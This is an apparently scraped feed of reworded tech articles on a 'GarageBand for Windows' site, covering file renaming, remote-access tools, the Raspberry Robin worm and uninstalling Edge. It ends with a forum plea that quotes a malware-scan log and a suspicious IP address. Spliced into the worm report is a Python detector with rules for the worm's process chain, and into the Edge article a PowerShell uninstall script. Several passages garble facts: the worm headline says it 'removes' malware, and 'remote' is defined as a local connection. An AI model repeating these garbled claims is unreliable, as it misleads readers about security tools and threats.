Windows Installer – Garageband For Windows PC
http://garagebandforwindowspc.org/

How to batch rename files in Windows 11 (2022)
https://garagebandforwindowspc.org/how-to-batch-rename-files-in-windows-11-2022/
Tue, 17 May 2022 05:53:13 +0000

When you are dealing with a large collection of files, there are times when you would want to rename them all simultaneously to manage them better. Renaming all files manually can be a frustrating experience, but Windows 11 offers several ways to rename your files in bulk. In this article, we will walk through the steps to rename files in batch in Windows 11.

Rename Files in Batch in Windows 11 (2022)

Rename Files in Batch with Windows 11 File Explorer

Did you know that you can use the default Windows 11 File Explorer to rename files in batches? Although not as versatile as PowerToys or other third-party batch file renaming software, it does the job for most users. This is how it works:

1. Open File Explorer using Windows 11 hotkey ‘Win + E’ and select the files you want to rename. Right-click on the selected files and click on the “Rename” icon from the context menu. You can also use the “F2” keyboard shortcut to rename files.

2. Enter the new file name and press the Enter key. While you will see the text box in one of the selected images, it should be noted that Windows will assign the same name to all selected files with different numbers.


3. As you can see in the image below, Windows batch renamed all selected files using the same name. If you don’t mind having a number at the end of the filename, that’s all you need to easily rename multiple files on Windows 11.


Use PowerToys to Batch File Rename in Windows 11

1. Download the latest version of PowerToys installer from GitHub and run the installer file. Follow the on-screen instructions to complete setup and open PowerToys.


2. When PowerToys opens, switch to the “PowerRename” tab in the left sidebar and click “Open Settings” to review your PowerRename settings.


3. By default, you will notice that the “Enable PowerRename” toggle is enabled. If not, enable it to use PowerRename.


4. Select the files you want to rename and right click on them. Click “Show more options” to expand the context menu and choose “PowerRename”.


5. When the PowerRename interface appears, type the word you want to replace in the upper box and the replacement word in the “Replace with” text box.


6. Click the “Apply” button on the lower left corner of the application to batch rename files in Windows 11 using PowerRename.


Third-Party Application to Batch Rename Windows 11 Files

You may also consider using dedicated batch renaming software to rename files in bulk. Although there are many options, one software we recommend is FastStone’s Photo Resizer. Although the app looks a bit dated, it’s fast and has a negligible learning curve.

1. Install FastStone Photo Resizer (download) and navigate to the folder containing the files you want to rename. Select the files and click the “Add” button to add them to the rename queue.


2. Now you can set the common name using the filename pattern or search and replace specific words in the filename. You also have the option of using name, year, date, etc. from the parent folder using the symbols detailed in the tips section of the app. After defining the desired name and format, click “Rename” button to rename files in bulk.


3. The app will show you a confirmation prompt. Click “Yes” to confirm the changes.


4. FastStone will now rename the files you selected, and you can see the results on the next page.


Easily rename files in bulk in Windows 11

So, those are three ways to batch rename files in Windows 11. Be sure to check out our other guides on how to always run apps as an administrator in Windows 11 and how to add a guest account in Windows 11. You can also check our article on the best hidden features of Windows 11 to further explore these features.

May 2022 Best Software to Manage Windows Remotely
https://garagebandforwindowspc.org/may-2022-best-software-to-manage-windows-remotely/
Fri, 13 May 2022 21:05:04 +0000

This list is about the best software to manage Windows remotely. We will do our best to help you understand it, and I hope you like it. So let’s start:


Remote access software allows one computer to view or control another computer, not just over a network, but from anywhere in the world. You can use it to connect to your customers’ computers and show them how to run a program or solve their technical problems. Or you can even use it to invite friends or clients to view your desktop while you run a demo for them. You can use the screen as a temporary whiteboard and draw lines and circles that will help your friends or clients understand what you are doing on your computer or their computer. Remote desktop software is a type of software or feature that allows the local system desktop environment to run remotely on one of the systems while it is on another system.

The word “remote” refers to a local connection. In a nutshell, remote access software helps the user access another user’s computer from their local system, through software on the same network, to handle business-related tasks such as desktop sharing, remote control, file transfer, etc. These tools are widely used by organizational help desks to solve the problems encountered by customers, saving time, reducing complexity and increasing customer satisfaction as a result.

Here is the list of the best software to manage Windows remotely

Zoho Assist

Zoho Assist is a multifunctional remote assistance software that helps you with remote assistance, unattended computer access, and screen sharing. Zoho Assist support plans include features like remote printing and brand customization. They’re great for people like help desk technicians and IT administrators. More advanced features are also accessible, with premium plans. Easy management of unattended computers with features like team grouping and departments.

Zoho Assist is protected by some of the best security integrations we’ve seen, which means it’s a great option for those who work with sensitive data. Zoho Assist is compatible with Windows, Mac, and Linux computers, Android and iOS devices, Raspberry Pi devices, and Chromebooks, so it can support a wide range of clients. Technicians can start sessions from their favorite browser or from the mobile or desktop app. Mass deployment options to configure large numbers of computers for unattended access.

RemotePC

RemotePC is a popular desktop software tool that helps you stay connected to your home or office system without having to travel. RemotePC is a very popular remote computer access application suitable for both home users and especially business users. It uses cloud technology to deliver state-of-the-art remote access solutions through an intuitive web application and native desktop and mobile apps. RemotePC has a good interface with a simple and straightforward learning curve.

RemotePC is highly secure, scalable and affordable. It also includes collaboration features such as voice chat. In effect, you can invite a person to temporarily access your system to work on presentations or documents in real time. It is mainly used by small organizations that require remote access. Enterprise plans include support for advanced computer and user management, as well as RemotePC Help Desk for on-demand remote support, ideal for large IT support companies.

ConnectWise Control

You must create an Access Agent installer to access it. Then you can share files and folders with whoever you want and keep your desktop clean with a simple drag-and-drop feature. With special role-based permissions, you can choose who to share your private documents with, even if you assign different roles to different people.

ConnectWise Control provides highly specialized remote access solutions for specific users. Their three support plans come with remote access features and include powerful tools to help IT staff and help desk technicians resolve issues remotely. The access plan supports 25 devices and is for those who want to connect to many remote devices.

Parallels Access

Parallels is long-loved software with full-screen operation and plenty of tools to make your life easier when working remotely. The Lock’n’Go magnifier has fantastic readability, so you can choose your text size. In addition, there are device-specific benefits. For example, if you’re using an Android, you can put your favorite apps on your home screen. It supports computer-to-computer connections, but most of its features are mobile-centric.

Parallels Access is strongly aimed at those who want to access their desktop computers from a mobile device. If you’re a Mac user, you’ll probably find the program easy to use as it incorporates all the gestures you’re already used to, like swipe to scroll or pinch to zoom. Parallels Access is designed for remote access to computers from mobile devices.

Team Viewer desktop tool

TeamViewer is a powerful remote access program that enables remote access from and to computers, mobile devices, network machines, etc. Over 2.5 billion devices use TeamViewer for its fantastic support and broad compatibility. Work from a remote PC, mobile phone or even another server and still get the access you need to continue your work and without the traditional VPN normally required. Team Viewer features remote device control and provides powerful cross-platform access.

Team Viewer focuses on cloud-based technologies to enable online remote support and collaboration on a global scale. It acts as a catalyst to promote and amplify people’s ideas and their ability to solve problems and overcome challenges. It’s designed to give users the ability to provide instant support to their teams and customers, whether it’s IT outages or outages. It wakes up, restarts and installs apps automatically.

Chrome Remote Desktop

With over 10 million installs, Google’s Chrome Remote Desktop is a leading free software tool for remote access. It’s easy to share your screen or connect to another computer. If you run into a problem, remote assistance is also available. That’s not all. If you forget your unlocked computer at home, it’s easy to access and secure it from home. The app also includes dedicated menu options for Ctrl-Alt-Delete and Print Screen.

Chrome Remote Desktop offers several useful features that simplify the experience and enable cross-device functionality. While using a desktop from another location can present logistical challenges, Chrome Remote Desktop makes it easy to avoid the most common pitfalls. The program is accessible by phone, tablet or other computer. It’s a super easy-to-use template that makes remote access simple.

Remote Desktop Manager

This platform not only allows your team to remotely access computers over a network. It also offers a variety of security and convenience features such as centralized password management, one-click logins, two-factor authentication, and role-based access controls. Remote Desktop Manager is capable of accessing more than just network desktops.

For individual users, including independent IT administrators, Remote Desktop Manager is free. There’s no access to most team features like role-based access controls and shared databases, but you can still remotely access your company’s networked computers and use built-in password management software. Another advantage of this platform is the centralized and encrypted vault that stores login credentials for different services on their network.

Final Words: Best Software to Manage Windows Remotely

I hope you understand and like this list Best Software to Manage Windows Remotely, if your answer is no, you can ask anything via the contact forum section linked to this article. And if your answer is yes, please share this list with your family and friends.

Stack Overflow examines how developers deal with stress • The Register
https://garagebandforwindowspc.org/stack-overflow-examines-how-developers-deal-with-stress-the-register/
Wed, 11 May 2022 21:44:00 +0000

What are your peers doing to avoid burnout? Stack Overflow research suggests that about half of developers still spend their breaks in front of a screen.

The Programming Q&A resource surveyed 800 developers and found that most of the top five things they do when they need a break involve screens: listening to music (46%), visiting Stack Overflow (41%), browsing social networks (37%), and watching videos (36%).

In fact, talking with other humans didn’t make the top five, and 4% of respondents had another outlet for stress (perhaps by angrily punching out really terse comments in the source).

Unsurprisingly, another takeaway from the survey was that the happiest developers had an employer that encouraged wellness, both physical and mental.

Sixty-two percent of respondents’ employers encouraged physical and mental well-being at work, and 75% of developers who described themselves as “happy” had just this type of employer. Alas, these figures mean that 38% of employers were not.

So how do you relieve stress?

Physical exercise is a good solution and half of the respondents go for a walk or do another activity when a break is needed.

“It’s one thing for an employer to encourage wellness; it’s another for people to actually change their habits to achieve their own wellness,” the Stack Overflow team noted. Eighty-eight percent of developers surveyed wanted to improve their physical well-being, while 83% wanted to improve their mental well-being.

However, there is a difference between wanting to improve and actually taking action to achieve it. After all, there are a fair number of gyms that seem to have business models based on signing up users and never bothering a treadmill again.

As for the developers surveyed, 57% tried to improve their well-being by simply drinking more water or improving their diet. Slightly fewer prioritized exercise while others intended to socialize with friends and family.

Stack Overflow cited research showing that two in five workers (out of more than 32,000 surveyed between January and September 2021) were at high risk of burnout. Sixty-two percent felt physically and emotionally drained, while 42% were considering quitting.

“Preventing burnout in a rapidly changing industry will always be a challenge,” the team observed. Employers can encourage workers to take breaks and prioritize wellness, but with more than a third of developers spending their breaks browsing social media, avoiding burnout means taking steps further away from the keyboard.

Last year, a trio of boffins advised software developers to participate in mindful breathing to improve their sense of well-being.

Not surprisingly, software users aren’t the only ones feeling the strain of working long hours under immense pressure: in 2020, nearly one in five infosec professionals were considering quitting their job due to overwork or burnout. ®

Plex users report blank or gray screen on Mac units after v.1.44.0 update
https://garagebandforwindowspc.org/plex-users-report-blank-or-gray-screen-on-mac-units-after-v-1-44-0-update/
Tue, 10 May 2022 02:03:45 +0000

Plex is one of the few media streaming services that allows users to play digital content from one machine to another. Over the years, the developers have added several new features to the app.

Users can opt for the free service that lets them stream content from their personal library or Plex’s paid service and access content from MGM, Lionsgate, and Warner Bros, among others.

But lately, issues like an interrupted fast forward and rewind feature and Plex Media Server crashing after the v1.26.0.5715 update have prevented many people from using the app.

Adding to the woes, Plex users who have updated the app to v1.44.0 on their Mac say they see a gray or blank screen and there is nothing they can do.

Some have already tried reinstalling the app, but that doesn’t help either. Many are confused and wonder if the developers are testing the app before releasing the update.

Here are some reports from Plex users who are stuck on gray or blank screen on their Mac after v1.44.0 update.


After auto-upgrading to the latest version of Plex Player for Mac, after launch, I get stuck on a gray screen with no ability to do anything (see attached screenshot) after the Plex logo appears. I tested on a secondary machine running the same build and didn’t have the same issue. The only difference between the two is that “Connect automatically” has been checked (set to yes/true) on the computer having the problem – my gut tells me it has something to do with it, as I have already seen this “problem” before, but was always able to fix it by rebooting.
(Source)

Same. Manually uninstalled all of the Plex related library. Restarted. New player installed 1.44.0.2981. Gray screen, can’t do anything. Preferences don’t even show up. Random clicks don’t seem to do anything. MacPro 6.1 with OS 10.14.6.
(Source)

Although the Plex developers have yet to comment on the issue, we have come across a workaround that seems to help those affected by the issue.

It requires users to uninstall the latest version, install v1.34 and then replace it with v1.43. You can download the required packages here.

That said, I was finally able to get it working by first wiping everything, then finding an old installer package for Plex-1.34.1.2601-ff212e16-x86_64. It worked, but crashed after about 2 minutes, each time. I then found a package for Plex-1.43.4.2971-aa2133cc-x86_64, overwritten v. 1.34, and it currently works. I would like to revert to the version prior to 1.44.0.02981, but I’m afraid to rock the boat…
(Source)

We’ll let you know when the Plex developers fix the blank screen issue on Mac, so keep checking this space for more updates.

Note: We have more stories like this in our apps section, so be sure to follow those as well.

PiunikaWeb began as a purely investigative tech journalism website with a primary focus on “breaking” or “exclusive” news. In no time, our stories were picked up by Forbes, Foxnews, Gizmodo, TechCrunch, Engadget, The Verge, Macrumors and many more. Want to know more about us? Head here.

How to update your PS5 controller via your PC
https://garagebandforwindowspc.org/how-to-update-your-ps5-controller-via-your-pc/
Sat, 07 May 2022 16:00:00 +0000

The PS5 controller, or the DualSense, is a fantastic controller. The features of the DualSense combined with its new shape and feel make it the ideal controller for a good portion of gamers, including PC gamers.

Although the DualSense controller works with a PC, you needed a PS5 to update it. Well, not anymore. PlayStation has released an app that allows you to update your DualSense through your PC. Let’s explore how and why you should use it.

You can now update your PS5 controllers with a PC

Due to its impressive feedback and improved ergonomics, the DualSense has been the choice of many PC gamers this generation. While it’s easy to connect to a PC, there was one minor issue: you needed a PS5 to update the DualSense’s firmware.

Fortunately, this has now been taken care of. PlayStation has announced that PC gamers can now update their PS5 controllers on Windows 11 and select Windows 10 devices.

If you’re wondering why you should update your PS5 controller, one of the main reasons is to keep the controller’s haptic feedback and adaptive triggers compatible with the latest games. With each firmware update, the controller saves the latest versions of video games and is able to react accordingly.

So while your PS5 controller won’t lose its basic functions if you don’t update it, it won’t be at its best either. Considering haptic feedback and adaptive triggers are the two main upgrades for the PS5 controller, it’s a shame to let those features go to waste.


How to update your PS5 controller using your PC

You can update your PS5 controller with your PC using the firmware updater app that Sony has developed just for this purpose. This app will detect and update your PS5 DualSense controller, and also notify you when a new update is available for it.

A wired connection and a Windows 10 or 11 PC are required for this task. The PlayStation 5 controller’s USB connector is USB-C, so you’ll need a USB-C cable to connect it to your PC. You should have received a USB-C cable in your PS5 package.

Although PlayStation has announced that the DualSense firmware updater will work on certain Windows 10 PCs, there have been no reports that the firmware does not work on specific versions of Windows 10. If you have a Windows 10 PC, so far, there is no reason to worry.

  1. Download the DualSense firmware update app.
  2. Open the .exe file. It will be under the name FWUpdaterInstaller.exe.
  3. Follow the installer’s instructions. The installation process is simple.
  4. Open the firmware update app.

Once you launch the DualSense firmware update app, you’ll be greeted with a simplistic screen asking you to connect your PS5 controller. It’s obvious what you need to do now:

  1. Connect your PS5 controller to your PC with a USB-C cable. The app will then change to give information about your controller and tell you if an update is available.

  2. Click on Update now. The update process will now begin.

  3. Once you receive a message telling you that the update is complete, you can close the application.


That’s it! Your PS5 controller firmware is now running on its latest version, and you can go and enjoy PC games that support your controller’s immersive features.

Always up to date

Going out of your way to update your PS5 controller might seem redundant at first, but this isn’t just any simple gamepad. The DualSense is loaded with various features and hardware, and a firmware update to coordinate all of these features with the latest video games is recommended.

With the DualSense firmware update app, you no longer need to update your PS5 controller via a PS5 console. So go ahead and update your DualSense controller!



New Raspberry Robin worm uses Windows Installer to remove malware
https://garagebandforwindowspc.org/new-raspberry-robin-worm-uses-windows-installer-to-remove-malware/
Thu, 05 May 2022 21:36:35 +0000

Red Canary intelligence analysts have discovered new Windows malware with worming capabilities that spreads using external USB drives.

This malware is related to a cluster of malicious activity called Raspberry Robin and was first observed in September 2021.

Red Canary’s detection engineering team detected the worm in the networks of several customers, some in the technology and manufacturing industries.

Raspberry Robin spreads to new Windows systems when an infected USB drive containing a malicious .LNK file is connected.

Once attached, the worm spawns a new process using cmd.exe to launch a malicious file stored on the infected drive.

Legitimate Windows tools misused to install malware

It uses Microsoft Standard Installer (msiexec.exe) to reach its command and control (C2) servers, likely hosted on compromised QNAP devices and using TOR exit nodes as additional C2 infrastructure.

“While msiexec.exe downloads and executes legitimate installation packages, adversaries also use it to deliver malware,” the researchers said.

“Raspberry Robin uses msiexec.exe to attempt external network communication to a malicious domain for C2 purposes.”

Although they have not yet found out whether it establishes persistence and by what methods, they suspect that the malware installs a malicious DLL file [1, 2] on compromised machines to resist removal between reboots.

Raspberry Robin launches this DLL using two other legitimate Windows utilities: fodhelper (a trusted binary for managing features in Windows Settings) and odbcconf (an ODBC driver configuration tool).

The former allows it to bypass User Account Control (UAC), while the latter will help run and configure the DLL.

Raspberry Robin Worm Infection Stream (Red Canary)
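
The behaviours described above (cmd.exe launching a file from a USB drive, msiexec.exe reaching out to a remote host, fodhelper and odbcconf being used to load a DLL) map onto simple process-creation checks. The following is an added example, not code from Red Canary or the original article; the event schema (host, pid, ppid, image, cmdline), the rule names, the removable drive letter and every sample event are constructed assumptions.

```python
import re
from collections import defaultdict
from ntpath import basename  # parses Windows paths on any OS

URL_RE = re.compile(r"https?://", re.IGNORECASE)
DLL_RE = re.compile(r"\.dll\b", re.IGNORECASE)

# Constructed process-creation events (hypothetical schema, not real telemetry).
SAMPLE_EVENTS = [
    # WS-01: the sequence the article describes, with placeholder paths and hosts.
    {"host": "WS-01", "pid": 100, "ppid": 10,
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c E:\constructed-sample.bin"},
    {"host": "WS-01", "pid": 101, "ppid": 100,
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /i http://host.example.invalid/pkg"},
    {"host": "WS-01", "pid": 102, "ppid": 101,
     "image": r"C:\Windows\System32\fodhelper.exe",
     "cmdline": "fodhelper.exe"},
    {"host": "WS-01", "pid": 103, "ppid": 102,
     "image": r"C:\Windows\System32\odbcconf.exe",
     "cmdline": r"odbcconf.exe <args> C:\Users\Public\constructed.dll"},
    # WS-02: ordinary administration that must not be flagged.
    {"host": "WS-02", "pid": 200, "ppid": 20,
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Installers\app.msi"},
    {"host": "WS-02", "pid": 201, "ppid": 20,
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c dir C:\Users"},
]


def image_name(path):
    """Lower-cased executable name from a full Windows image path."""
    return basename(path).lower()


def detect(events, removable_drives=("E:",)):
    """Return {host: [(rule_name, pid), ...]} for events matching a rule.

    removable_drives is an assumption: the caller must know which drive
    letters were removable media on the host when the events were logged.
    """
    by_pid = {(e["host"], e["pid"]): e for e in events}
    drive_re = None
    if removable_drives:
        letters = "|".join(re.escape(d) for d in removable_drives)
        # A drive letter followed by a backslash, not preceded by a letter.
        drive_re = re.compile(r"(?<![A-Za-z])(?:" + letters + r")\\", re.IGNORECASE)

    findings = defaultdict(list)
    for e in events:
        name = image_name(e["image"])
        parent = by_pid.get((e["host"], e["ppid"]))
        parent_name = image_name(parent["image"]) if parent else ""
        cmd = e["cmdline"]

        # cmd.exe launching something stored on removable media.
        if name == "cmd.exe" and drive_re and drive_re.search(cmd):
            findings[e["host"]].append(("cmd_from_removable_drive", e["pid"]))
        # msiexec.exe pointed at a remote URL instead of a local package.
        if name == "msiexec.exe" and URL_RE.search(cmd):
            findings[e["host"]].append(("msiexec_remote_url", e["pid"]))
        # Any child of fodhelper.exe (the UAC-bypass step in the article).
        if parent_name == "fodhelper.exe":
            findings[e["host"]].append(("child_of_fodhelper", e["pid"]))
        # odbcconf.exe whose command line references a DLL.
        if name == "odbcconf.exe" and DLL_RE.search(cmd):
            findings[e["host"]].append(("odbcconf_loads_dll", e["pid"]))
    return dict(findings)


def hosts_matching_chain(findings, min_stages=3):
    """Hosts where at least min_stages distinct rules fired."""
    return sorted(h for h, hits in findings.items()
                  if len({rule for rule, _ in hits}) >= min_stages)


if __name__ == "__main__":
    results = detect(SAMPLE_EVENTS)
    for host in hosts_matching_chain(results):
        print(host, results[host])
```

Each rule alone will also fire on some legitimate activity, so the per-host stage count is what makes the result worth triaging.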

How and why?

Although Red Canary analysts were able to closely inspect what the new discovery does on infected systems, there are still several questions that need to be answered.

“First and foremost, we don’t know how or where Raspberry Robin infects external drives to perpetuate its activity, although it’s likely to happen offline or otherwise outside of our visibility. Nor do we know why Raspberry Robin installs a malicious DLL,” the researchers said.

“One hypothesis is that this may be an attempt to establish persistence on an infected system, although additional information is needed to build confidence in this hypothesis.”

Since there is no information about the malicious end-stage tasks of this malware, another question that needs to be answered is what is the purpose of the Raspberry Robin operators.

Further technical information on the Raspberry Robin worm, including indicators of compromise (IOCs) and an ATT&CK of this malware, can be found in Red Canary’s report.

How to uninstall Microsoft Edge from Windows 11
https://garagebandforwindowspc.org/how-to-uninstall-microsoft-edge-from-windows-11/
Tue, 03 May 2022 20:59:00 +0000

You cannot uninstall Microsoft Edge from Windows 11 in the conventional way – you have to resort to a specific command entered in a specific folder using the system command prompt.

Image: Mark Kaelin/TechRepublic/Microsoft

Microsoft Edge web browser is heavily integrated with Windows 11 and Windows 10 operating systems. For all intents and purposes, Edge should not be removed or uninstalled from your system under any circumstances. However, many users still search for ways to remove Microsoft Edge despite the possible consequences.


In Windows 11, there is a way to uninstall the Edge browser with a specific command entered at a command prompt opened in the correct folder. The method is similar to the method used to remove Edge from Windows 10, but the caveats and consequences of removing it are even more pronounced. You have been warned.

How to uninstall Microsoft Edge from Windows 11

First, a clarification. This method will uninstall Microsoft Edge from Windows 11, but it will not change the browser that your system sees as its default. First you need to install a new web browser on your system and make it the default browser. Changing your default web browser to something other than Edge is a simple process and should be done before attempting to completely uninstall Edge.

Once your new browser is installed, search for “default apps” in the Windows 11 search tool and choose the appropriate settings result. Scroll down the default apps page and choose Microsoft Edge (Figure A), then change the default settings for another browser or application. Once you have changed your default web browser, you can proceed with uninstalling Edge.

Figure A

Clarification number two. You cannot uninstall Microsoft Edge using normal methods. The process must be completed through the command prompt, and this command prompt must be located in the appropriate folder.

The first step is to find the appropriate folder. Open File Explorer and navigate to this folder:

C:\Program Files (x86)\Microsoft\Edge\Application\101.0.1210.32\Installer

Note: The version number (101.0.1210.32) may be different on your system.

Copy the full path to the Installer folder to the Windows clipboard (Figure B). We will use this copied path to point the command prompt at the appropriate folder.

Figure B

Type “command prompt” into the Windows 11 search tool and select the appropriate item from the search results, making sure to select the administrative rights option (Figure C).

Figure C

With the command prompt open, type or copy these commands, of course using your version number:

cd/

Enter

cd Program Files (x86)\Microsoft\Edge\Application\101.0.1210.32\Installer

Enter

At the end of this sequence of commands, your command prompt should be in the correct folder (Figure D).

Figure D

Now type this command and then press Enter to uninstall Microsoft Edge from Windows 11.

setup.exe --uninstall --system-level --verbose-logging --force-uninstall
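The same procedure as a PowerShell script, added here as an example and not part of the original article: it finds the versioned Installer folder instead of hard-coding 101.0.1210.32, checks that setup.exe carries a valid Microsoft signature before it is run elevated, and only prints the command unless `-Execute` is given. The parameter names and the default `$EdgeRoot` location (taken from the path shown above) are assumptions of this example.

```powershell
# Added example, not from the original article. Run from an elevated PowerShell prompt.
[CmdletBinding()]
param(
    # Assumption: Edge is installed in the per-machine location shown in the article.
    [string]$EdgeRoot = "${env:ProgramFiles(x86)}\Microsoft\Edge\Application",
    # Without -Execute the script only reports the command it would run.
    [switch]$Execute
)

# Version folders are named like 101.0.1210.32; sort them as versions, newest first.
$versionDirs = Get-ChildItem -LiteralPath $EdgeRoot -Directory -ErrorAction Stop |
    Where-Object { $_.Name -match '^\d+(\.\d+){3}$' } |
    Sort-Object { [version]$_.Name } -Descending

# Pick the newest version folder that actually contains Installer\setup.exe.
$setup = $null
foreach ($dir in $versionDirs) {
    $candidate = Join-Path $dir.FullName 'Installer\setup.exe'
    if (Test-Path -LiteralPath $candidate -PathType Leaf) {
        $setup = $candidate
        break
    }
}
if (-not $setup) {
    throw "No Installer\setup.exe found under $EdgeRoot"
}

# Refuse to run a binary that is unsigned, tampered with, or not signed by Microsoft.
$sig = Get-AuthenticodeSignature -FilePath $setup
if ($sig.Status -ne 'Valid' -or
    $sig.SignerCertificate.Subject -notmatch 'O=Microsoft Corporation') {
    throw "Unexpected signature on ${setup}: $($sig.Status)"
}

# The uninstall needs administrative rights, as the article notes.
$identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal = [Security.Principal.WindowsPrincipal]::new($identity)
$isAdmin   = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

# Flags exactly as given in the article.
$flags = '--uninstall', '--system-level', '--verbose-logging', '--force-uninstall'

Write-Host "Installer : $setup"
Write-Host "Signer    : $($sig.SignerCertificate.Subject)"
Write-Host "Command   : `"$setup`" $($flags -join ' ')"

if (-not $Execute) {
    Write-Host 'Dry run only. Re-run with -Execute to uninstall.'
    return
}
if (-not $isAdmin) {
    throw 'Not elevated. Start PowerShell with "Run as administrator" and try again.'
}

# Run the uninstaller from its own folder and report its exit code.
$proc = Start-Process -FilePath $setup -ArgumentList $flags `
    -WorkingDirectory (Split-Path -Parent $setup) -Wait -PassThru
Write-Host "setup.exe exited with code $($proc.ExitCode)"
```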

To reinstall Microsoft Edge, search for the app on Microsoft Store and install it on your Windows 11 PC from there.

Again, it is important to emphasize that it is neither necessary nor recommended to take the drastic step of completely uninstalling Microsoft Edge from your Windows 11 device. Changing your default browser will produce the same result and avoid unpredictable and unforeseen negative consequences.

How to remove Chrome OS Flex and reinstall Windows (2022) https://garagebandforwindowspc.org/how-to-remove-chrome-os-flex-and-reinstall-windows-2022/ Sat, 30 Apr 2022 08:37:47 +0000

We recently wrote a tutorial on how to install Chrome OS Flex on a Windows PC, and the majority of users loved the lightweight Chrome OS profile. However, some users have started encountering issues such as Wi-Fi incompatibility, trackpad issues, Bluetooth disconnection, audio issues, etc. on Chrome OS Flex. Not to mention that some Windows apps were missing on Chrome OS Flex, although you can run lightweight Windows apps on Chrome OS. Still, if you’re not impressed with Chrome OS Flex, here’s a simple guide on how to remove Chrome OS Flex and reinstall Windows 10 or 11. So on that note, let’s go ahead and learn how to uninstall Chrome OS Flex.

Remove Chrome OS Flex and reinstall Windows (2022)

1. First, you must create a bootable USB drive for Windows 10 or 11. You can follow our detailed guides on how to create a bootable Windows 10 USB or a bootable Windows 11 USB. For this step, you will need a separate Windows PC.

2. After that, plug the bootable USB into the Chrome OS Flex machine and shut down the computer. Then turn on the computer and start pressing the boot key immediately. You can find the boot key for your laptop or motherboard in the table below. This will bring up the boot device selection page.

3. Here, choose the USB drive onto which you flashed Windows 10 or 11. Then press Enter.

4. Now the Windows Installer setup will appear. For Windows 10 and 11, the steps are the same, so no worries about that. Here, click “Install now“.

5. After that, click “I don’t have a product key” on the next page.

6. Next, click “Custom: Install Windows only (advanced)“.

7. If there are multiple partitions, select each partition and click “Delete”. Do this for all partitions. This step will remove Chrome OS Flex from your computer. Now, when there is only one partition left, select it and click “New”. It will create additional partitions needed to run Windows.

8. Finally, click “Next” and Windows 10/11 will start installing on your PC.

9. After installation, your computer will restart and boot into the setup screen. Now you can sign in to your Microsoft account or follow our guide and create a local account on Windows 11.

10. Once the setup process is complete, you will be back to Windows. In my case, I removed Chrome OS Flex and reinstalled Windows 11. I’d suggest unlocking Windows 11 to at least have a usable experience on your low-end computer.

Uninstall Chrome OS Flex from your PC

This is how you can uninstall Chrome OS Flex from your PC and reinstall Windows 10 or 11, depending on your preferences. If you have a low-end PC, I would suggest installing Tiny10, which is a lite version of Windows 10. Anyway, that’s it for this guide. If you are still having trouble removing Chrome OS Flex from your laptop, let us know in the comments section below. We will try to help you.

Viruses/Powershell scripts run daily https://garagebandforwindowspc.org/viruses-powershell-scripts-run-daily/ Thu, 28 Apr 2022 16:50:18 +0000

Hello everyone,

It looks like there is a Powershell infection in my computer. Bitdefender Total Security is unable to detect any files, but displays the following notifications:

Every time I see these things related to powershell.exe it’s always tied to the IP 152.89.247.113

Other dangerous pages seen in Bitdefender, BE CAREFUL NOT TO INFECT YOURSELF TOO:
EDIT: links removed

I ran FRST64; here are the logs.

FRST.txt:

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 22-04-2022
Ran by Phenom (administrator) on DESKTOP-QF06V5V (Gigabyte Technology Co., Ltd. B450 GAMING X) (28-04-2022 19:03:26)
Running from C:UsersPhenomDesktop
Loaded Profiles: Phenom & User
Platform: Microsoft Windows 11 Pro Version 21H2 22000.652 (X64) Language: English (United States)
Default browser: "C:Program FilesGoogleChrome BetaApplicationchrome.exe" --single-argument %1
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Blizzard Entertainment, Inc. -> Blizzard Entertainment) C:ProgramDataBattle.netAgentAgent.7661Agent.exe
(C:Program Files (x86)Epic GamesLauncherPortalBinariesWin64EpicGamesLauncher.exe ->) (Epic Games Inc. -> Epic Games, Inc.) C:Program Files (x86)Epic GamesLauncherEngineBinariesWin64EpicWebHelper.exe <2>
(C:Program Files (x86)F-SecureFreedomeFreedome1.1fsvpnservice.exe ->) (F-Secure Corporation -> F-Secure Corporation) C:Program Files (x86)F-SecureFreedomeFreedome1.1Freedome.exe
(C:Program Files (x86)F-SecureSAFEUltralightulcore1651147404fshoster64.exe ->) (F-Secure Corporation -> F-Secure Corporation) C:Program Files (x86)F-SecureSAFEUltralightulcore1651147404FsPisces.exe
(C:Program FilesBitdefender AgentProductAgentService.exe ->) (Bitdefender SRL -> Bitdefender) C:Program FilesBitdefender Agent26.0.1.220DiscoverySrv.exe
(C:Program FilesBitdefenderBitdefender Securitybdservicehost.exe ->) (Bitdefender SRL -> Bitdefender) C:Program FilesBitdefenderBitdefender Securitybdagent.exe
(C:Program FilesBitdefenderBitdefender Securitybdservicehost.exe ->) (Bitdefender SRL -> Bitdefender) C:Program FilesBitdefenderBitdefender Securitybdntwrk.exe
(C:Program FilesBitdefenderBitdefender Securitybdservicehost.exe ->) (Bitdefender SRL -> Bitdefender) C:Program FilesBitdefenderBitdefender Securitybdwtxag.exe
(C:Program FilesBitdefenderBitdefender Securitybdservicehost.exe ->) (Bitdefender SRL -> Bitdefender) C:Program FilesBitdefenderBitdefender Securityseccenter.exe
(C:Program FilesMalwarebytesAnti-MalwareMBAMService.exe ->) (Malwarebytes Inc -> Malwarebytes) C:Program FilesMalwarebytesAnti-Malwarembamtray.exe
(C:Program FilesNVIDIA CorporationNvContainernvcontainer.exe ->) (Microsoft Windows -> Microsoft Corporation) C:WindowsSystem32rundll32.exe
(C:Program FilesNVIDIA CorporationNvContainernvcontainer.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:Program FilesNVIDIA CorporationNVIDIA GeForce ExperienceNVIDIA Share.exe <3>
(C:Program FilesNVIDIA CorporationNvContainernvcontainer.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:Program FilesNVIDIA CorporationShadowPlaynvsphelper64.exe
(C:Program FilesRogueKillerRogueKillerSvc.exe ->) (ADLICE -> ) C:Program FilesRogueKillerRogueKiller64.exe
(C:Program FilesWindowsAppsMicrosoftWindows.Client.WebExperience_421.20070.95.0_x64__cw5n1h2txyewyDashboardWidgets.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:Program Files (x86)MicrosoftEdgeWebViewApplication100.0.1185.50msedgewebview2.exe <6>
